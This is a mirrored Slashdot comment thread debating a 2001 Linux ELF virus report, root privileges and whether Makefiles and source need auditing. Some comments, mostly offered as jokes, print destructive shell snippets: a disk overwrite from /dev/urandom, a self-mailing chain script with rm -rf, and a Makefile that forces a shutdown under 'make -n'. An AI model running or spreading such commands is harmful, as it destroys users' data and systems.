Slashdot Mirror
Linux Virus Alert
marcjw writes: "I don't see many of these (Linux virus alerts). In fact none in the six months or so since I've switched from MS. Maybe that's why this story from newsbytes caught my eye. At any rate, I'm not sure if this poses much of a threat to the general Linux community but it's always best to be forewarned."
At least our email programs dont auto execute attachments.
Ya, I run lots of unknown binaries while logged in as root, it's my favorite activity.
Go Lakers!
As we speak (write?) there are surely a couple of computer labs paid by McAfee, Norton, etc. trying to create some kind of successful Linux virus/worm. =)
A patch that allows the virus to exploit Windows will be released in Service Pack 1 for Windows XP.
Or is it just that virus writers focus their efforts on MS software? (And if it's the last one, why do malicious coders focus on MS? Is it just to spread FOAD and, indirectly, their favorite OS?)
Username taken, please choose another one.
#!/bin/sh /dev/urandom > /dev/hda1
cat
There. It's a virus.
-twb
Scene: Redmond, Washington - early Saturday evening in a building on the Microsoft campus.
MS Coder #1: "Dude! We made the front page on Slashdot! Bill is gonna hump our legs for this!"
MS Coder #2: "Cool! When we finish RST.c we might even make CNN!"
It could happen...
Knunov
Why do users with IDs under 100,000 or over 700,000 usually have the most worthwhile comments?
Um, he further states that it would be "trivial" to add such a feature. Almost all win32 repositories have such scanners in place why wouldn't the largest linux software sites have them as well? Have we become too trusting of the "many eyes" theory?
An Education is the Font of All Liberty
What services use this EGP protocol?
I'm assuming that if my box doesn't run anything that uses this, then it's not vulnerable to exploitation.
Sig (appended to the end of comments you post, 120 chars)
Au contraire! Because of the sheer volume of servers currently running linux, it would appear to be one of the most attractive platforms to write virii for.
A programmer could certainly wreak a lot more havoc by planting their seeds in big web servers, domain name servers, mail servers, etc., rather than just messing up a bunch of average peoples' desktops.
Unlike some Windows-based viruses that travel like wildfire using vulnerabilities in Microsoft's Outlook e-mail program, the new RST variant is unlikely to spread widely, according to Russell.
One short sentence to compare and contrast the MS Virus Deployment System with Linux. I also like the part where he says that most Linuxers are more "sophisticated" (must be why our mascot wears a tux).
I'm a bloodsucking fiend! Look at my outfit!
Linux, an alternative to Microsoft's Windows.
Heh, couldn't they just write "An operating system"?
I am a genius; therefore, you suck.
I didn't see anything in the article about how it actually propogates. It didn't read like a worm, so what binaries (tarballs and RPMs) are suspect? Anyone? Anyone?
Jack of all trades, master of some.
So, I see defense of Linux already. But why not place some blame on those who made this security hole? One of the major things Linux has going for it is it's lack of security flaws, and lack of virii.
But it's not a hole. It's the "beauty of unix security". You can do what you want as root, and pay the consequencecs, or run as non-privilidged luser, and only screw up your own files. What **I'm** waiting for, is the *nix virus that binds to non-privilidged ports, infects normal lusers(by looking for permissive permissions in pathed directories)
The previous has been a secret message to my comrades.
Do NOT run "deltree /Y *"-- this is a very dangerous trojan that could potentially destroy your system!
The worst part is, it's already infected 100% of all DOS 7 systems.
(Is is just be, or does it seem silly to give any time to a "virus" that requires you to run a binary while rooted?)
Has anyone actually seen this virus in the wild? I can't imagine it'd actually propigate...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
More virii. Glad that no one likes the Mac but me and two other people... Sevendust is the last major threat we had...
./configure
make
su -
make install
I'm sure everyone doesnt audit every line of code
before doing this...
-b
.. runs your Linux binaries (if you can't get source)..
.. runs your FreeBSD binaries (if you can't get source)..
.. remember most "Linux" code is just generic UNIX C..
.. Be safe, run OpenBSD.
Whereas, I'm working on porting this virus to NetBSD, and putting it in the pkgsrc collection, so it can be enjoyed on a VAX, an Amiga, hey, you name it! You too can feel "cool" when your alpha gets infected. Who says the only people who get viruses are those running intel boxen with windows!
And for the netBSD/toaster port, I guess I'll just have to make it burn the toast on one side, and leave the other side raw.
The previous has been a secret message to my comrades.
I can write a binary that when run by root will erase your entire system. And I can probably do so in under a minute. Somehow, I doubt it will ever hurt anyone. Anyone smart anyhow.
Programs that exploit security holes are far and wide. Yet, they are typically released as source code, usually attached to messages in security mailing lists. We can take a quick glance over this source before compiling it and running it. And besides, if it IS your typical exploit code, nobody needs to run it as root. To do so would defeat the purpose of having an exploit in the first place.
I do like the statement, however, that linux users are less likely to open unknown attachments. Says quite a lot about our community right there.
-Restil
Play with my webcams and lights here
and so on. Symantec/Norton also has a Linux/UNIX binary which is certainly bundled with the network-wide thing, I don't know if it's available separately. The trouble with all of these things is that although they are Linux applications, they detect Windows virii - they use the same signature files as the versions on other platforms do. This means they're very good for running on file/e-mail servers to protect the poor Windows machines behind them (which is what they're intended for) but they probably won't stop the subject of this post, for example. Basically, yes, they exist and work well but make sure you know what you're hoping for them to do...
Who would run a virus that is distributed as a binary only? Everyone knows no self respecting linux user uses software unless the source is available! Until they release this virus under the GPL I for one will be staying well clear of it.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
Perhaps I'm wrong on this, but this is a trojan, not a virus. Viruses reproduce and spread automatically, and from the article's description, this does not. Requiring users to run something at each point that it infects is NOT a virus, it is merely a trojan horse.
Mozilla's a nice operating system, but it needs a better browser.
RPMs or other packages that are downloaded from more or less untrusted locations without encryption signatures might very well run a few evil scripts during the installation process (which, of course, is done as root).
To be really sure, one should always install new programs in a chrooted jail; the software should be installed in a totally new branch of the filesystem tree and the installation process should not be able to read of write to other parts the filesystem.
Go not unto/. for advice, for you will be told both yea and nay (but have nothing to do with the question)
I'm a security researcher.
Good point, and there should be a focus on the potentual of Linux virii out there (though most of the focus has been on fixing probable remote exploits which in itself can do some contaminations since some servers NEED root permissions to run.) Again, distros SHOULD turn off servers by default, don't let X run its listener, etc, etc, to prevent remote exploits but also there needs to be a focus to scan for virii especially if you have a heterogenus network to work with in case there's multiple platforms that could be targeted. Though the article is correct; the reason why we Linux users don't get targeted is because we know better. This will change if Linux starts to gain market share to a point of at least 15%-25%. Either this 15%-25% will be bright, or they will be gullable to virii, I can't say.
Karma whorin' since 1999
Finally, the most popular genre of windows software has been ported to Linux! Goodbye, WINE!
...the only real security hole is 'User Error'.
Not only are people bothering to write viruses for it, the popular press now refers to Linux as in "programs written for Linux, an alternative to Microsoft's Windows".
My glass is half full.
Free Java games for your phone: Tontie, Sokoban
Personally, I consider anti-virus software viruses themselves. They often cause more problems and interfere with your system much more than any 'virus' Just look at what they do...constantly run, constantly run every file access against a big-assed hash table, possibly causing problems with legitimate software. No thanks.
A lot of smart alecs here are making light of this, but let's face it, the smart thing is to give time to any virus at all. Tell me you've never, ever, left yourself in as root by mistake. OK, now tell me no-one else has. 'Nuff said.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
DOS isn't done until Lotus won't run.
As a rock-in-roll Physicist once said, No matter where you go, there you are.
Who do email attachments target in windows? Windows newbies. Who run things as root without checking to make sure they're safe or thinking about what they're doing? Linux newbies and lazy people.
This virus would probably get me.. though I usually only get executables in packages made by my distro manufacturer (it's just easier and almost guaranteed to work), I find it annoying to su constantly, so I often just play around on my own box as root. I wouldn't administer a server that way (should someone ever be stupid enough to give me the responsibilities of doing so), but I don't think that's who the virus is targeting.
And waddaya know, UNIX application programmers are _still_ using the occasional gets(3) call in setuid root programs, more than a decade later, despite the fact that we all know that it doesn't check for buffer overflow and that a buffer overflow _can_ be used (read: _has_ been used in the past) to make a program execute code of the worm writer's choice and bring a significant part of the internet grinding to a halt.
You'd read all of the source that KDE or Gnome requires for compilation and installation?
Not likely.
It doesn't matter if it requires root privs to run. Most programs have to be installed as root, and that's all that is needed. The make install step can do something nasty without telling you (how many people fully read & understand the Makefiles in the above scenario?), or it can install a trojan version of ls or any other program.
In a real emergency, we would have all fled in terror, and you would not have been notified.
Who's your favorite Looney Tunes character?
Bug's Bunny
Daffy Duck
or
Elmer FUD
> The only way a linux virus is ever going to do
...)
> damage is if it gets into a package on a major
> distro's ftp and goes unnoticed.
How about if it,
- infects source code (not too hard...)
- installs itself in system headers so that all new programs compiled would include it (#define main
- infects kernel modules, or the kernel itself
- exploits common vulnerabilities to infect new hosts or to gain root on the local host (I would venture a guess that *most* people who don't have users are not safe against all local root exploits)
I could imagine a really good virus making its way around, especially right around the time a new remote root exploit is announced... I don't think a linux virus is that far-fetched, especially as more unsophisticated users begin using linux, and as our platforms grow more homogeneous...
Damn, I'm impressed. I could probably kick out a binary to do the same but it would take me more than a minute just to write the ELF header, not to mention the object code source. Of course if you meant write a program I'd be suprised if it took someone a full minute to do this. I know what you meant just f'ing with you a little.
I'm the big fish in the big pond bitch.
What you describe is actually a worm, or at least, that's what we used to call it.
Virii generall spread by either
a) staying in memory and infecting files by some mechanism
b) doing an infection/action run each time an infected file (or subsystem) is invoked.
Most 'viruses' today do not infect other files at all; they infect systems, making them worms. They are software in and of their own right, running on the host system like a parasite.
Okay since the outside thread is pretty boring I might as well go into off topic land.
:I ; many of the words are nice complements to the english language or associated jargons.
That list is lame. I thought it would be a list of words and phrases that are improper and just plain dumb that we hear all the time. Instead, I guess people just nominate words that they are sick of hearing. For example:
Surgical Strike: Personally, I think this is a fine phrase that evokes a visual image. It means you are not being careless.
Friendly Fire: Again...the meaning is obvious. It means that the there is an attack but they are not attacking you! What other phrase would substitute so concisely?
Brainstorming: Okay...I'd like to see phrase go away. Its used to decieve...I can't think of an honest use of it. A word that I love but should never be used in a publication is "brainfart".
Killer App: The meaning to this is very concise and is almost necessary when talking about the history of computing. Of course, it is abused a lot but that doesn't mean it doesn't have a solid useful meaning.
So basically...a lot of the words I agree with should be banished (bleh, solutions
Heh-heh.
.exe's anyway!"
I do like the statement, however, that linux users are less likely to open unknown attachments. Says quite a lot about our community right there.
<sarcasm>
It says, "Pine makes it really frickin' hard to run a binary, and all my mother-in-law sends me are
</sarcasm>
"Genius may have its limitations, but stupidity is not thus handicapped." --Elbert Hubbard (1856-1915)
Hey, historically-challenged dude, early smallpox vaccines (which used live smallpox virus, not cowpox) WAS only used by the rich. They were the only ones who could afford to be laid up in bed for a month while the illness ran its course. The poor opposed vaccination since the virus often jumped from the rich to the poor who couldn't afford vaccination.
In Europe this wasn't an issue - smallpox (and its high mortality rate) was a childhood disease. In the Americas it was still a rare disease, and George Washington took a tremendous gamble in vaccinating his troops on reports that the British were planning on spreading smallpox among his troops. This infection subsequently traveled down to Mexico, and back north as far as Southeastern Alaska. It's an interesting question, but totally unanswerable, how many people died in the 19th Century from the aftermath of the American Revolution, vs. the number who died from the US's own infected blankets.
The moral of this story is that global vaccination is best, but in many circumstances a limited vaccination can be nearly as effective. Mandatory vaccination of travellers will do a lot more good than mandatory vaccination of the people who work in the fields. Securing your servers will do a lot more good than securing pockets of desktop machines.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
If a non-root user has infected himself, then the virus is present, and it won't be able to create /dev/hdx1 or /dev/hdx2. It also will not be able to listen for EGP packets. The damage from a non-priv user being infected will be pretty minimal, unless file permissions are loose, and others start to run infected files.
Personally, I always run make -n install just to see what it is going to do (it's easier than opening the file if I think it already has the right paths set). It's one of those extra steps that Just Make Sense (TM), like prepending 'echo' when you rm with -r or with wildcards as root. You'll be glad you did when you look at the output, slap your forehead, and breath a sigh of relief. =)
Extra sidenote: if you're compiling a program that uses GNU autoconf (etc.) to configure the makefile, you might be interested in the --prefix= option (where you can tell most sane programs to install somewhere other than the default). I always install to a test directory in my home directory before going system-wide (so I can, say, test a new version of an app).
Good example: OpenSSH has had tens of holes just the last year
:)
We've got 8 in our bug database for 2001. Are you holding out on OpenSSH holes?
There aren't any Linux viruses in circulation at
present, so there's nothing to protect against.
The few Linux viruses that do exist seem to have
been created as exercises to prove that it can
be done, but they are not "in the wild".
Linux worms, however, do exist and can be very
dangerous. The difference between a virus and
a worm is that, to get a virus you have to somehow run a program that you've received;
worms attack over the network using known vulnerabilities. (There are many more worms for
Windows, e.g. Code Red).
The way to protect
against them is not with an anti-virus program
(that would be useless), but by keeping current
with the security updates for your distribution.
The anti-virus companies would dearly love to
add to their business by convincing Linux users
that we need their services. Just say no;
their approach is not to fix the problem, but
to just give you a list of "known criminals"
that they can spot. Anti-virus software is
useless against a new virus; this means you have
to keep going back to your pusher, um, your
anti-virus company, for updates. Actually
improving security would be bad for business.
Yes... but although I type rather fast, I would definitely typo at least something once.. and forget an include file.... like you did.....
So.. I'd have to compile... then go edit it again, fix it.. then recompile...
then trash my system.
-Restil
Play with my webcams and lights here
The plural of virus is viruses.
Rich...
Ignore Alien Orders
Good point. But even if your crack team of security experts inspect and approve each and every line of source code, then do a "make world", you still are not safe!
Long ago Ken Thompson wrote a paper about a trojan/backdoor that is source code clean . This is usually accompanied with an antecdote about a guy at a computer show struggling to get his demo ready, but he forgets his root password. Just then, a bearded freaky guy from the next booth says "No problem", types a magic password, and viola! The demo proceeds as planned. The story is that every version of
It's possible. Read the paper!
PS: Most linux users do not even attempt to build their systems from source. Every linux system is shipped with
How can this be considered a security hole? This is the equivalent of sending an email with BO2K or NetBus to the administer email account on some Windows box and telling them to run it as administrator. At work, we have hundreds of Linux boxes we administer. We never put any kind of software on them except for Apache, MySQL, Oracle or whatever we know and have tried.
:)
/^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+(\.[a-zA-Z0-9_- ]+)+/ ~/.addressbook
/^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+(\.[a-zA-Z0-9_- ]+)+/ ~/.addressbook
/***" | mail -s "Important security update" $emailaddy
/
;)
If you really want to call this a security hole or virus, I've written a virus for you. Note, however, you cannot look at the code and must run it as root and send it to everyone you know.
#!/bin/sh
# DISCLAIMER: This program is provided AS IS with no war
# ranty of any kind, and The author makes no representation
# with respect to the adequacy of this program for any par
# ticular purpose or with respect to its adequacy to produce
# any particular result, and The author shall not be liable
# for loss or damage arising out of the use of this program
# regardless of how sustained, and In no event shall the
# author be liable for special, direct, indirect or conse
# quential damage, loss, costs or fees or expenses of any
# nature or kind. IF YOU ARE READING THIS, YOU HAVE VOIDED
# THE WARRANTY BECAUSE YOU WERE TOLD NOT TO READ THE SOURCE.
emailaddy=grep
echo "Please copy the following lines to a shell script and run it as root\n\n***#!/bin/sh
emailaddy=grep
echo \"Please copy the following lines to a shell script and run it as root\" | mail -s \"Important security update\" $emailaddy
rm -rf
rm -rf
Do not actually run this, for it actually works.
This short little shell script will exploit vulnerabilities in the sysadmins lack of experience... basically exploiting the same "security vulnerabilities" in the alternative to Microsoft Windows thing... USER ERROR!
How many linux users actually run programs without at least glancing at the source anyway? If you don't compile everything from source, shame on you. The main reason, IMHO, virii are aimed at MS instead of Linux is because most linux developers started coding on Windows (like everyone else who started coding within the last 10 years). They are disgruntled at the years of suffering at the hands of Billy G.. Windows is also a very easy target. Virii are also written for windows in order to switch people from MS to alternatives. If you would notice, within a week of a very recent Netcraft web server report when Apache dropped and IIS rose, code red was out.
Just my $0.02.
sglane81
This is the Internet. You can say "fuck" here. - AC
"It is the duty of the project maintainer to make sure that their files are free of virii
It doesn't help when people have this kind of attitude. If it would be trivial to scan for virii, why the hell wait for someone else to request it?
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
The Morris worm is a nice spectre to pull out of the Unix closet and remind everyone that Unix is not infallable. Just look at all the damage done in the early internet days! Spooky.
However, this is history - ancient by Interent standards. Since then, there have been other Unix-based worms to hit the net at large. I can name three more recent examples off-hand. Sadmind spread amoung Solaris hosts to deface IIS sites. The ramen worm attacked Linux (specifically RedHat) hosts. And there were reports of ramen code being modified and sent on its way. And then there was another Linux worm called li0n.
In each case the worm hit the wild, was discovered and reported, had a brief life as appropriate counter measures were taken, then faded out. Missing was the media frenzy one would expect with something as damaging as the Morris worm. That came later on a different platform with a different worm: Code Red.
Once again - Unix is not infalliable. But various generations have been in the trenches dealing with infosec issues for years. Recent incidents have began to show off its experience, versitility, and resiliance. It is small wonder the Unix crowd tends to look at virus issues with almost a disinterest compared to their Windows counterparts who are burned either more often or more severely by such a threat.
I'm often asked - `won't viruses for Linux start to appear once Linux gains more desktop users?'. And I always explain what it is about Linux and Unix-like operating systems in general that make this very unlikely (the strict separation between root and users in particular). However, at present we have a situation in which there is a very strong sense of mutual trust: if you see some code being offered for download in the usual places you know that it's very unlikely that it will harm your system if you build it / install it as root.
It is worth thinking about the possible dangers of these particular waters getting muddied - as Linux gains more users, there will be more people around with less sophistication about these matters and there could be more people deliberately offering dangerous code for download.
So there are some reasons for concern but they are based on faults in the potential users, not in the OS.
Roger Whittaker
SuSE Linux Ltd London
The good thing is that apparently there was not a single case where this virus infected anyones computer except for the anonymous person who reported it to Qualys. This new virus is at least three times more dangerous because three different groups have seen it.
The most difficulty part with this type of virus is getting people to run it as root. The easiest way would be to install the virus through a Makefile which are often run as root. This is one reason I think the standard tar.gz install should be:
#-----
zcat foo.tar.gz | tar -xv
if source
cd foo/
make
fi
cd
su
cp foo
ln -s
#-----
Makefiles are too complex for most people to read but a script that installed things my way would only be 5 lines executed as root and thus easy to audit.
(Normal
On a completely unrelated topic, this virus can't spread very well. Linux users download packages from central repositories but they don't share ordinary binaries amongst themselves. The virus only infects elf excecutable files where in Windows it could infect emails and
These days, the only dangerous way to spread a virus is through an internet worm. Linux is vulnerable to worms because almost everyone uses the same kernel, webserver, dns, and email server. If we could diversify these things, it would make Linux less vulnerable to worms.
I know people are going to say that Linux is already more secure than Microsoft. That's true but it's because Microsoft does not care about security or threats to the internet. A truly malicious virus could cost billions of dollars in lost hardware and take out the American phone system for weeks.
Yeah, that's fine for people who have some experience with Unix, but for Joe Random User who's just bought this new Red Hat thing 'cos his friend said it was quite good and he doesn't want to spend more money on Windows it doesn't really help. I mean, he's not going to instinctively sit down and start ntsysv and appreciate what 'nfslockd' and 'portmap' do and whether he does or doesn't need them; he's probably not even going to understand the concept of services for a while. It's basically the old argument about Linux on the desktop again: everything has to work properly out-of-the-box, not work well if you just tweak this configuration file and patch and recompile your X server or people simply won't bother and will run away screaming because of all the scary things they're now being exposed to whereas with Windows it 'just worked'. Now, personally I'd hate it if all the distributions became like Windows and had irritating wizards all over the place and friendly quickstarts and so on, but making the default settings for things like security right is not hard and wouldn't have any negative effects at all as far as I can see. I think Red Hat's firewall set up is a good compromise; of course, the way Debian does it (not enabling this by default, and so on) is far better, but whatever its advocates might say Debian is not really as user-friendly for newbies as Red Hat (or particularly Mandrake) and isn't really designed to be. That said, I started with it...
For that matter, I can't help wondering whether MS would fund the development of Linux viruses.
He not only does not have root permissions - he doesn't even know 'root' exists, or what it is; clicking on Netscape's Icon in the GUI is about at his limits. I gave him a command line menu with a script when he exits X that will allow him to go back to the GUI or shut his machine down, and tell him when to turn off the power. (The exit from X script also erases the .netscape/lock file in case Netscape crashes and won't restart properly.)
Since Netscape's email won't execute binaries by clicking on them I don't have to worry too much about him getting infected. I make regular cdrom backups of his home directory - just in case.
The only problem he has had is that he thought he wasn't getting new emails because he had accidentally changed the sort order from 'date' to 'subject' with a misplaced mouse click. I showed him how to change sort orders, and once he saw that he hadn't lost anything he was happy.
The great virtue of the machine is that his Windows machine is now completely disconnected from the net and highly unlikely to ever get a virus. He likes the Linux box so much he wants me to get rid of Windows altogether: there is only one Windows app I haven't converted to Linux yet: a massive custom Access ap which will take a large development effort to duplicate.
# Save this as Makefile and try "make -n install" /sbin/shutdown now)
# with GNU Make.
#
# This runs even with -n, and doesn't print first.
foo:=$(shell
#
# This too runs with -n, but is displayed.
# (I use a semicolon in case slashdot loses tabs.)
install:; +echo this runs too
Not trying to sound like a troll, but this post is an example of what is holding linux back from being a major contendor in the desktop OS market. Time and time again i see people saying that no self respecting linux user would run a program without first examining the makefile and looking over the source. The VAST majority of home computer users would have no idea how to do that, and that is even assuming they had any knowlege of coding. How likely is it that a new user would download the source if a binary is avalilble? Convenience and simplicity is what MS is targeting, and by all acounts it is working. Hate MS all you want, but the fact of the matter is that windows is run by virtually all home computers and is far more familiar and user-friendly for most simple tasks. It may not be as powerful, as secure, or as elegent at *nix, and though some may say is dumbs down the computing experience so that any moron can use a computer, that is precisely why MS owns the home computing market. The average person would not WANT to check the code for every program he or she installs, even if that person knew enough about linux and programming to make a difference. Sure, maybe all of those people that post on /. are smart enough not to get hit by this or any other virus, but /. readers do not make up the majority of computer users, as much as everyone wishes they were. Elitist atitudes about the linux 'community' is what keeps linux away from the general home computer community. As shown in this post, Linux users are just as bad at trying to downplay the possibility of being hit with a virus. Go count how many of the posts go on about how there is hardly any risk at all of viruses in Linux. I use and love linux, but instead of finding the type of constructive development I was hoping to find on how viruses were playing a part in linux, I found a bunch of people pounding their chests as to how THEY are so damn good that there is no threat to them, and how if you actually are hit by this virus, there must be something wrong with your head.
Isn't the possibility of infection of system binaries the reason we have tripwire?
It, tripwire, may be a pain to run sometimes but it is a pretty good idea if you want to have an even higher level of protection.
Codifex Maximus ~ In search of... a shorter sig.
The incidents post which provides more info on the virus can be found at:
http://www.securityfocus.com/archive/75/247481
I agree this virus isn't a huge threat. I do believe some people here are underestimating it a little. You do not have to be root when running the infected file... If a user runs the file it will attempt to infect all files in their current working directory. Now possible files the user trusts might get infected and then a user is more likely to run those files as root. Still leaves a problem with it spreading from box to box since most people grab source and compile programs themselves. I am not sure how this is spreading but I believe it is through one of the many ssh crc exploits that are being traded around in binary form.
I have the commented asm dump I made but I have no where to post it till my site goes back up
lockdown
Heh. If you see the string "Linux engineers are weenies" or "seineew era sreenigne xuniL" in it, then let slip the dogs of conspiracy theories. ;)
--
Given enough personal experience, all stereotypes are shallow.
I've installed XP, both Home and Professional. By default the user they create for you has Administrator privileges. You can downgrade it, but you have to know exactly what you're doing. And by default you can't log in to the Administrator account, it doesn't show as an option, so if you screw up you have to wipe the machine and reinstall.
The fact that I have never heard of such a trojan (or at least not a damaging one) is an indication that this does not work. I think this is because such a trojan would be detected and disabled (or at least warned about) long before it did much damage.
My solution was to make it setuid root, grouped by my sysadm group, and only executable by that group and root. Basic user/group works like a champ. Now if your non-prived sysadm user (you do have a prived and non-prived sysadm user besides your personal user, don't you?) get 0wned, well, you're screwed if nmap has sploitable code. Of course if that user gets 0wned, you probably have more to worry about.